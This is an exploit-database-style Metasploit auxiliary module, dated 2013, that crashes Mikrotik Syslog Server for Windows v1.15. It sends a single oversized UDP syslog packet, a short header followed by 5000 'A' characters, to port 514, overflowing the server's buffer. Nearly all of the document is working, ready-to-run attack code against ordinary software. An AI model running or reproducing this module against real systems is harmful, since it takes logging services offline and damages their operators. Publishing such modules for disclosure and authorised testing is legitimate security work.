# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS # Date: 19.04.2013# Exploit Author: xis_one@STM Solutions # Vendor Homepage:www.mikrotik.com# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe# Version: 1.15 (most recent version 19.04.2013) # Tested on: Windows XP SP3, Windows 7 SP1
require 'msf/core'class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize
super('Name'=> 'Mikrotik Syslog Server for Windows - remote BOF DOS','Description' => %q{
This module triggers the windows socket error WSAEMSGSIZE (message to long)
in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
The long syslog message overwrite the allocated buffer space causing the socket error.},'Author'=> 'xis_one@STM Solutions','License' => MSF_LICENSE,'DisclosureDate' => 'Apr 19 2013')
register_options([
Opt::RPORT(514)])end
def run
connect_udp
pkt = "<0>"+"Apr19 "+"10.0.0.2 "+"badass"+": "+"A"*5000
print_status("Crashing the remote Mikrotik syslog server #{rhost}")
udp_sock.put(pkt)
disconnect_udp
endend